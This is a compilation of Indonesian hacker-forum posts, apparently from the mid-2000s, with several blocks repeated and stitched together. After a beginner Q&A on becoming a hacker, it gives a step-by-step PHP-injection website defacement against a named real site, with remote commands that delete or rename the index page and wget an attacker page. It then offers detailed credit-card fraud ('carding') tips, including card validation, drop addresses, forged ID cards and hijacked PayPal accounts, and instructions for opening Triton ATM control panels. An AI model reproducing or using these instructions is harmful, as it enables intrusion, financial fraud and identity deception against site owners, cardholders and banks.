J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu
T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.
T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell
T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu
T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb
T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan
T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif
[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.
T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!
[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.
[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok
[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem
[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.
T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )
T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com
ReFerensi :
[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker - Eric S Raymond
Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis Newbie_hacker@yahoogroups.com
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting
*greetz to:
[echostaff : moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to]
{ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },
anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel
kirimkan kritik && saran ke y3dips[at]echo.or.id
*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004
deface web berbasis PHP
Dalam tutorial singkat ini akan di bahas mengenai deface web berbasis PHP.
Langsung saja.
kita anggap kamu sudah tahu mengenai teknik inject menggunakan injeckt PHP dan
mendapatkan sasarannya.
Contoh :
Sasaran kita adalah :
http://www.mutznutz-nightclub.co.uk/index3.php?page=
kita singkat sebagai : (target)
dan file injeckt nya
http://geocities.com/finalheaven_ardi/final.txt?&cmd=ls -alF;uname -a
kita singkat : (inject)
langkah - langkah deface sbb :
Pertama :
Pindahkan atau ubah (rename file index.php/htm/html) default website target
perintahnya :
(target)=(inject)=mv index.php xxx.php
atau
(target)=(inject)=mv index.htm xxx.htm
atau
(target)=(inject)=mv indext.html xxx.html
tergantung index default website tersebut menggunakan php.htm atau html asalkan
dapat kita cari file nya yang berawalan dengan kata index dan xxx. itu terserah
kita akan kita rename dengan nama lain.
Kalau tidak kita rubahpun yang lebih kejam lagi yaitu dengan menghapus index-nya
perintahnya :
(target)=(inject)=rm -rf index.xxx
( xxx : adalah extension belakang index seperti php atau htm atau html )
setelah itu tinggal kita upload file index kita
contoh file index kita terletak pada :
http://www.geocities.com/ardi_terror/index.htm
perintahnya :
(target)=(inject)=wget http://www.geocities.com/f1nal_he4ven/index.htm
jika selesai, maka selesai sudah proses deface pada website tersebut dengan mengubah
tampilan index asli milik website tersebut dengan index milik kita
sangat sederhana bukan...???
Langsung saja.
kita anggap kamu sudah tahu mengenai teknik inject menggunakan injeckt PHP dan
mendapatkan sasarannya.
Contoh :
Sasaran kita adalah :
http://www.mutznutz-nightclub.co.uk/index3.php?page=
kita singkat sebagai : (target)
dan file injeckt nya
http://geocities.com/finalheaven_ardi/final.txt?&cmd=ls -alF;uname -a
kita singkat : (inject)
langkah - langkah deface sbb :
Pertama :
Pindahkan atau ubah (rename file index.php/htm/html) default website target
perintahnya :
(target)=(inject)=mv index.php xxx.php
atau
(target)=(inject)=mv index.htm xxx.htm
atau
(target)=(inject)=mv indext.html xxx.html
tergantung index default website tersebut menggunakan php.htm atau html asalkan
dapat kita cari file nya yang berawalan dengan kata index dan xxx. itu terserah
kita akan kita rename dengan nama lain.
Kalau tidak kita rubahpun yang lebih kejam lagi yaitu dengan menghapus index-nya
perintahnya :
(target)=(inject)=rm -rf index.xxx
( xxx : adalah extension belakang index seperti php atau htm atau html )
setelah itu tinggal kita upload file index kita
contoh file index kita terletak pada :
http://www.geocities.com/ardi_terror/index.htm
perintahnya :
(target)=(inject)=wget http://www.geocities.com/f1nal_he4ven/index.htm
jika selesai, maka selesai sudah proses deface pada website tersebut dengan mengubah
tampilan index asli milik website tersebut dengan index milik kita
sangat sederhana bukan...???
m'ngecek cc valid atau tidak
carding is so worthed to die..
xco wrote:
sang penguasa dunia maya, q newbie bgt niiy..mo minta usul bole yak.. dbase cc dah dpt.. valid.. cvv2 dah dpt jg.. expire..masi lama tw! nah yg q bingung drop brg dmn yaaa...???help me!! shipping address kmn y??bagi2 pengalaman dnk.. thx yup
jangan keburu uakin dengan apa yang tercantum pada tulisan expired yang ada pa CC
cek dulu validitas nya di www.wallet.yahoo.com kalo lolos berarti tuh CC masih hidup
dan siap untuk dihajar
ato kalo ga gitu coba tes aja buat beli acount email di apple.com
disitu klo ga salah emailnya diatas 70$ pertahun jika lolos berarti tuh CC valid,,,
soal drop place pake trick missent alias pura-pura salah kirim
selanjutnya buka mesin pencari andalan google.com
dan ketikan " how to carding " ato apa kek yang berbau carding termasuk drop place yg
bisa buat toko yakin,,,,
salam hangat slipknoters_
FUCK HIP HOP
xco wrote:
sang penguasa dunia maya, q newbie bgt niiy..mo minta usul bole yak.. dbase cc dah dpt.. valid.. cvv2 dah dpt jg.. expire..masi lama tw! nah yg q bingung drop brg dmn yaaa...???help me!! shipping address kmn y??bagi2 pengalaman dnk.. thx yup
jangan keburu uakin dengan apa yang tercantum pada tulisan expired yang ada pa CC
cek dulu validitas nya di www.wallet.yahoo.com kalo lolos berarti tuh CC masih hidup
dan siap untuk dihajar
ato kalo ga gitu coba tes aja buat beli acount email di apple.com
disitu klo ga salah emailnya diatas 70$ pertahun jika lolos berarti tuh CC valid,,,
soal drop place pake trick missent alias pura-pura salah kirim
selanjutnya buka mesin pencari andalan google.com
dan ketikan " how to carding " ato apa kek yang berbau carding termasuk drop place yg
bisa buat toko yakin,,,,
salam hangat slipknoters_
FUCK HIP HOP
Tips dan Tricks Carding:::...
carding (pencurian kartu kredit)
By : CardingHost
Bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala
kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan
yg ingin mencoba terjun dalam kegiatan carding....
Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat email
bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account
(JANGAN klik menu pull down : add 1 account email. Sebab kita memanfaatkan NetSol
hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur
selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila
ditolak, gunakan nomor lainnya
Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar
telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman
kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut,
kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi
sebelum publikasi, hanya CardingHost yg mengorder, dan barang yg diorder kuantitasnya
minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, www.timeclub.
com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini)
Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick :
*Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman
lainnya (?.dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg
tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di
kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya
alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda,
alasannya : "?.itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X"
(pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya
pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa
Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga
menggunakan trick diatas)
*Bisa menggunakan nama dan alamat asli, karena order barang
senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet)
tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.)
Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut
bukan milik orang di Indonesia
Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses
validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda
masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org
(..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor
tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol
tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita
gunakan tsb sudah dicharge sebesar US$ 105
Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik
kita (pembeli), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X"
mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan
Shipping Address (alamat tujuan pengiriman barang) harus sama. Jika dlm billing address
yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama
si "X" tadi
Jika anda tinggal di Propinsi D.I. Yogyakarta, sebaiknya alamat pengiriman barang jgn
dikirim ke Kota Gudeg tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor
pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan ating. Apa lagi
untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya,
kemungkinan besar masih bisa. Sebagai masukan, Yogyakarta menduduki peringkat ke-1
dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat
III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin
bisa meraih peringkat I di dunia
Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita
order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga
barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus
dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari
biaya penebusan
Dalam pengisian alamat email (milik kita) utk jalur konfirmasi dari pihak online
shop, sebaiknya gunakan alamat 'email bayar'. Karena, selain tidak ada banner (menghemat
waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya
Tidak semua online shop yg ada menggunakan VeriSign di websitenya aman dan ketat
dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali,
pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani system
pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule
juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya
account tsb
Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan
metode pembayarannya/ payment methode (kecuali anda menguasai bahasa di negara online
shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran
cash on delivery (pembayaran dilakukan di alamat tujuan). Tapi, bila metode seperti itu
yg anda pilih, maka biasanya pihak online shop akan menanyakan (mengirim email konfirmasi)
lagi, "?.apakah barang tersebut benar - benar mau dikirim ?" Solusinya : anda reply
emailnya, dan katakan anda tidak jadi memesan, karena besok anda harus berangkat ke
Singapura atau Hongkong, etc. untuk urusan kantor
Bila anda mendapat email konfirmasi dari pihak online shop berupa ancaman
(..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan
perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu
kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu.
Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar,
pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti
biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh
solusinya,masih bejibun online shop yang lain
Jika anda dikirimi email konfirmasi dari pihak online shop berupa email kosong,
namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan
didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah
(bukan di tempat umum), karena kemungkinan besar file tersebut mengandung Virus. Bila
yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/
mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer
client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda
mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya Trojan, anda bisa
menginstall ulang sistemoperasi pd komputer anda (dgn asumsi, anda harus menghapus bersih
folder sistemoperasi anda tersebut sebelum reinstall), dengan sistemoperasi yg masih
fresh
Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga
tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan email konfirmasi ketika
barang akan dikirim. Atau bahkan tidak mengirimkan email konfirmasi kepada kita, saat
setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila
ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa
yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c
(jadi ada nilai kemungkinannya)
Jika anda disebut sebagai thief, frauder, etc., pada email konfirmasi dari
online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya
Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki.
Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya
diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik
dalam pembentukan mental carder)
Kalo ada waktu, cobalah stand by di channel #indocarder atau anda bisa bergabung
pada Forum Diskusi Carder Indonesia di website kami. Jika memiliki kendala atau
masukan utk dibahas bersama dengan carder lainnya, guna mengetahui situasi yg sedang
terjadi di dunia carding Indonesia
Pelajari teknik hacking/cracking step by step
Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda.
Semoga kita semua dalam lindungan-Nya. Amin
?.Maaf kami tidak menyertakan Tips dan Tricks utk auction,
sebab saya yakin rekan - rekan sudah mendapatkan nya dari referensi di tempat lain.
By : CardingHost
Bukan maksud utk menggurui rekan carder Indonesia lainnya, maka dgn segala
kerendahan hati kami mencoba utk membagi Tips dan Tricks ini utk rekan - rekan
yg ingin mencoba terjun dalam kegiatan carding....
Bagi rekan carder yg memiliki nomor extrapolate, dpt mencoba membuat email
bayar pada Network Solutions (www.networksolutions.com) dgn tdk menambah account
(JANGAN klik menu pull down : add 1 account email. Sebab kita memanfaatkan NetSol
hanya utk mengetahui nomor extrapolate tsb masih berlaku atau tidak), ikuti prosedur
selanjutnya, sampai pada sesion pemasukan nomor tadi. Ulangi pengisian nomor apabila
ditolak, gunakan nomor lainnya
Anda dpt mengunjungi toko - toko yg ada pada website ini, yg sebagian besar
telah kami coba. Dan jgn khawatir, keterangan disamping tokonya adalah pengalaman
kami sebenarnya. Masalah sedikit banyaknya yg sudah mengorder di toko tersebut,
kami tdk jamin 100%, namun perlu diketahui bhw situs ini tadinya situs pribadi. Jadi
sebelum publikasi, hanya CardingHost yg mengorder, dan barang yg diorder kuantitasnya
minimal sekali, namun rutin (lihat pada halaman 1 daftar online shop, www.timeclub.
com yg berkali-kali mengirim barang dlm kurun waktu 1 tahun terakhir ini)
Anda dpt mengorder barang senilai LEBIH DARI US$ 1000 dgn menggunakan trick :
*Gunakan identitas palsu pada saat mengambil barang di kantor pos atau jasa pengiriman
lainnya (?.dgn memalsukan KTM/Kartu Tanda Mahasiswa biasanya lebih mudah, dan foto yg
tampak di KTM palsu tadi harus sesuai dgn wajah si "X" yg mengambil barang tsb, di
kantor pos atau jasa pengiriman lain). Sedangkan namanya, tetap nama si "X", hanya
alamat di kartu identitas yang kita palsukan. Jika ditanya kenapa alamatnya berbeda,
alasannya : "?.itu alamat lama, dan saya sudah pindah rumah/kost". Apabila nama si "X"
(pengambil barang) berbeda dengan nama yang dikirimi barang (hasil dari order), biasanya
pihak kantor pos atau jasa pengiriman lainnya akan meminta surat kuasa
Anda dpt mengorder barang senilai US$ 500 dgn menggunakan trick : (bisa juga
menggunakan trick diatas)
*Bisa menggunakan nama dan alamat asli, karena order barang
senilai US$ 500 masih tergolong rendah, atau gunakan alamat Warung Internet (Warnet)
tempat anda biasa mengakses (tentunya bekerja sama dengan si penjaga Warnet tsb.)
Anda dpt mengorder barang kurang dari US$ 200 dgn aman apabila nomor tersebut
bukan milik orang di Indonesia
Apabila anda menggunakan nomor extrapolate yg sudah digunakan pada saat proses
validasi di Network Solutions, berarti nomor tersebut telah dicharge sebesar yg anda
masukkan tadi, makanya buat serendah - rendahnya dlm membuat domain tadi, misalnya .org
(..sekitar US$ 60). So, kalo udah gitu, utk mengetahui besarnya biaya charge dari nomor
tsb tinggal jumlahkan aja harga barang yg diorder dengan biaya yg udah dicharge di NetSol
tadi. Bila harga barang yg diorder senilai US$ 45, berarti nomor extrapolate yg kita
gunakan tsb sudah dicharge sebesar US$ 105
Pada saat proses order (shopping), pengisian data Nama, Alamat dan lainnya milik
kita (pembeli), harus sama dengan alamat yg akan dikirimi barang. Misalnya, si "X"
mengorder barang, maka pengisian Billing Address (alamat faktur si pemesan) dan
Shipping Address (alamat tujuan pengiriman barang) harus sama. Jika dlm billing address
yg memesan barang atas nama "X", maka pengisian nama pada shipping address harus nama
si "X" tadi
Jika anda tinggal di Propinsi D.I. Yogyakarta, sebaiknya alamat pengiriman barang jgn
dikirim ke Kota Gudeg tsb. Karena apabila anda tidak ada kongkalikong dengan pihak kantor
pos atau jasa pengiriman lainnya, jgn pernah mengharap barang akan ating. Apa lagi
untuk barang - barang yg tergolong 'wah', namun jika majalah dan CD serta sejenisnya,
kemungkinan besar masih bisa. Sebagai masukan, Yogyakarta menduduki peringkat ke-1
dlm event kegiatan carding di Asia, sementara Indonesia sendiri menduduki peringkat
III dunia masih dlm event kegiatan carding. Bahkan dalam waktu dekat, Indonesia mungkin
bisa meraih peringkat I di dunia
Besarnya biaya penebusan dpt bervariasi, tergantung dari (pajak) barang yg kita
order (biasanya mulai dari Rp 3000,- sampai lebih dari Rp 100.000,-). Atau ada juga
barang yg dikirim langsung ke alamat tujuan. Jangan takut dulu bila anda disuruh menebus
dgn biaya tinggi, karena kemungkinan besar barang yg dikirim itu nilainya lebih dari
biaya penebusan
Dalam pengisian alamat email (milik kita) utk jalur konfirmasi dari pihak online
shop, sebaiknya gunakan alamat 'email bayar'. Karena, selain tidak ada banner (menghemat
waktu loading), ada sedikit nilai tambah di mata pihak online shop yg kita order barangnya
Tidak semua online shop yg ada menggunakan VeriSign di websitenya aman dan ketat
dalam proses validasi kepemilikan kartu kredit, jadi jangan patah semangat dulu. Kecuali,
pihak online shop melibatkan pihak Pay Pal (pihak ketiga sbg perantara yg menangani system
pembayaran), itu pun masih bisa kita akali. Caranya, manfaatkan account milik orang bule
juga di Pay Pal, lalu gunakan saja dgn percaya diri penuh, seolah - olah kita yg punya
account tsb
Jika anda shopping di online shop selain yg berbahasa Inggris, sebaiknya diperhatikan
metode pembayarannya/ payment methode (kecuali anda menguasai bahasa di negara online
shop tsb). Karena jika anda tidak teliti, bisa - bisa anda memilih metode pembayaran
cash on delivery (pembayaran dilakukan di alamat tujuan). Tapi, bila metode seperti itu
yg anda pilih, maka biasanya pihak online shop akan menanyakan (mengirim email konfirmasi)
lagi, "?.apakah barang tersebut benar - benar mau dikirim ?" Solusinya : anda reply
emailnya, dan katakan anda tidak jadi memesan, karena besok anda harus berangkat ke
Singapura atau Hongkong, etc. untuk urusan kantor
Bila anda mendapat email konfirmasi dari pihak online shop berupa ancaman
(..beberapa waktu setelah anda melakukan order), yg mengatakan mereka akan mengadukan
perbuatan anda ke federasi/organisasi internasional yg menangani penipuan (fraud) kartu
kredit dan akan mengenakan denda sebesar US$ 1000 atas perbuatan anda, jangan takut dulu.
Karena itu hanya geretak si customer service online shop aja. Sebab kemungkinan besar,
pihak online shop tsb sudah pernah terkena biaya recharge (tagihan balik, alias mengganti
biaya produksi kepada si pemilik nomor kartu kredit yg asli). Nah, cuekin aja deh
solusinya,masih bejibun online shop yang lain
Jika anda dikirimi email konfirmasi dari pihak online shop berupa email kosong,
namun ada file berekstensi .exe yg disertakan di attachment, lebih baik jangan
didownload/dieksekusi file tadi. Apalagi jika anda yg mengakses Internet dari rumah
(bukan di tempat umum), karena kemungkinan besar file tersebut mengandung Virus. Bila
yang mengakses dari tempat umum (misalnya Warnet) dan sudah terlanjur mendownload/
mengeksekusi file tersebut, sebaiknya anda berhenti mengakses. Dan pindahlah ke komputer
client lainnya, atau bila ingin lebih fresh, pindah ke Warnet lain. Sedangkan jika anda
mengakses Internet dari rumah, untuk menjaga kemungkinan dari bahaya Trojan, anda bisa
menginstall ulang sistemoperasi pd komputer anda (dgn asumsi, anda harus menghapus bersih
folder sistemoperasi anda tersebut sebelum reinstall), dengan sistemoperasi yg masih
fresh
Catat semua barang yg anda order, dan dikirim atas nama siapa, jgn lupa catat juga
tanggalnya. Sebab banyak juga online shop yg tdk mengirimkan email konfirmasi ketika
barang akan dikirim. Atau bahkan tidak mengirimkan email konfirmasi kepada kita, saat
setelah melakukan order (email konfirmasi biasa, setelah kita order). Gunanya, apabila
ada order yg berhasil dikirim, dan atas nama si "X", kita bisa memperkirakan barang apa
yg datang, dgn melihat catatan tadi, bhw si "X" memesan barang a, b, atau c
(jadi ada nilai kemungkinannya)
Jika anda disebut sebagai thief, frauder, etc., pada email konfirmasi dari
online shop, cuekin aja, jangan dibalas, karena masih banyak online shop lainnya
Kesabaran, ketelitian, dan keuletan merupakan modal dasar yg hrs anda miliki.
Hilangkan sifat takabur, karena hanya akan mendatangkan kehancuran. Siapkan percaya
diri sepenuhnya, seakan - akan kita si pemilik nomor/account (hal ini sangat baik
dalam pembentukan mental carder)
Kalo ada waktu, cobalah stand by di channel #indocarder atau anda bisa bergabung
pada Forum Diskusi Carder Indonesia di website kami. Jika memiliki kendala atau
masukan utk dibahas bersama dengan carder lainnya, guna mengetahui situasi yg sedang
terjadi di dunia carding Indonesia
Pelajari teknik hacking/cracking step by step
Jangan lupa berdoa kepada Tuhan YME, sesuai dgn agama dan kepercayaan anda.
Semoga kita semua dalam lindungan-Nya. Amin
?.Maaf kami tidak menyertakan Tips dan Tricks utk auction,
sebab saya yakin rekan - rekan sudah mendapatkan nya dari referensi di tempat lain.
mengakali atm banking
jaqk wrote:
Di sini kita bukan membahas cara membobol ATM, tapi hanya sebuah ilmu pengetahuan bagaimana control panel ATM tersebut bekerja, control panel????apa tuwh… control panel adalah sebuah menu khusus dimana pengaturan dari ATM tersebut dapat dikontrol melalui mesin ATM, hal ini biasanya hanya dipegang oleh engineer ATM atau orang yang diserahi tugas untuk mengurus mesin ATM yang ngadat dari sabang sampai merauke .. Tujuan dari artikel ini juga untuk mengetahui, ternyata control panel ATM dapat dilihat oleh siapa saja, asal tau manual book dan caranya …
BATASAN
Batasan yang ada di sini adalah:
- Mesin atm ber merk triton
- Tidak semua jenis bisa diimplementasikan, tapi hanya beberapa jenis, Seperti quick card 8100, RT2K Quickcard, 9100, 9710,9700, 9705 dan jenis lainnya
Untuk mencoba mesin – mesin ini anda cukup berjalan ke mesin ATM, kemudian lihat mesin tersebut apakah ber merk triton atau tidak, cara melihatnya mas??? Cara melihatnya tidak ada petunjuk khusus, cukup tebak ajalah … namanya juga belajar di jalanan, bukan belajar di tempat khusus yang kita perlu menyediakan duit 2-3 juta per sesi, belum lagi kalau traineer nya galak … wuuuuuu … hahahahhahah!!!! … okay … setelah sampai di ATM, lihat tombolnya, disitu ada tombol angka kan, sebenarnya tombol angka tersebut bukan hanya jika dipencet tombol 1, berarti mesin menjalankan perintah untuk memunculkan angka satu, tapi jika dipencet angka satu, maka bisa memunculkan control panel.
Tapi sebelumnya kita harus menekan tombol yang berada di kanan paling bawah (KETIKA ADA TULISAN Selamat Datang di ATM Bank ….), tahan tombol tersebut kemudian tekan tombol <1> , kemudian lepaskan kedua tombol tersebut secara bersamaan, maka akan timbul control panelnya.
MERESET ATM
Untuk mereset ATM cukup pilih Menu Management Function , kemudian masukkan password, naaaaaa di sini… kalau memang passwordnya masih kosong, anda bias melanjutkannya, tapi kalau dari pihak bank sudah mengisi password tersebut, cukup tending ATM-nya dan lanjutkan ke mesin percobaan berikutnya… hahahahha, tapi jika berlanjut, cukup tekan DIAGNOSTIC, kemudian TERMINAL STATUS dan lanjutkan dengan menekan pilihan RESET TERMINAL ERROR.
Nah silahkan coba dengan menu lainnya, cukup donlot :
http://www.tritonatm.com/en/service/manuals. Very Happy Very Happy Very Happy
wekekeke....
AWAZ..
kayanya too much risk tuh???
stau gw, coba klo ketik pass atm terbalik,
Di sini kita bukan membahas cara membobol ATM, tapi hanya sebuah ilmu pengetahuan bagaimana control panel ATM tersebut bekerja, control panel????apa tuwh… control panel adalah sebuah menu khusus dimana pengaturan dari ATM tersebut dapat dikontrol melalui mesin ATM, hal ini biasanya hanya dipegang oleh engineer ATM atau orang yang diserahi tugas untuk mengurus mesin ATM yang ngadat dari sabang sampai merauke .. Tujuan dari artikel ini juga untuk mengetahui, ternyata control panel ATM dapat dilihat oleh siapa saja, asal tau manual book dan caranya …
BATASAN
Batasan yang ada di sini adalah:
- Mesin atm ber merk triton
- Tidak semua jenis bisa diimplementasikan, tapi hanya beberapa jenis, Seperti quick card 8100, RT2K Quickcard, 9100, 9710,9700, 9705 dan jenis lainnya
Untuk mencoba mesin – mesin ini anda cukup berjalan ke mesin ATM, kemudian lihat mesin tersebut apakah ber merk triton atau tidak, cara melihatnya mas??? Cara melihatnya tidak ada petunjuk khusus, cukup tebak ajalah … namanya juga belajar di jalanan, bukan belajar di tempat khusus yang kita perlu menyediakan duit 2-3 juta per sesi, belum lagi kalau traineer nya galak … wuuuuuu … hahahahhahah!!!! … okay … setelah sampai di ATM, lihat tombolnya, disitu ada tombol angka kan, sebenarnya tombol angka tersebut bukan hanya jika dipencet tombol 1, berarti mesin menjalankan perintah untuk memunculkan angka satu, tapi jika dipencet angka satu, maka bisa memunculkan control panel.
Tapi sebelumnya kita harus menekan tombol yang berada di kanan paling bawah (KETIKA ADA TULISAN Selamat Datang di ATM Bank ….), tahan tombol tersebut kemudian tekan tombol <1> , kemudian lepaskan kedua tombol tersebut secara bersamaan, maka akan timbul control panelnya.
MERESET ATM
Untuk mereset ATM cukup pilih Menu Management Function , kemudian masukkan password, naaaaaa di sini… kalau memang passwordnya masih kosong, anda bias melanjutkannya, tapi kalau dari pihak bank sudah mengisi password tersebut, cukup tending ATM-nya dan lanjutkan ke mesin percobaan berikutnya… hahahahha, tapi jika berlanjut, cukup tekan DIAGNOSTIC, kemudian TERMINAL STATUS dan lanjutkan dengan menekan pilihan RESET TERMINAL ERROR.
Nah silahkan coba dengan menu lainnya, cukup donlot :
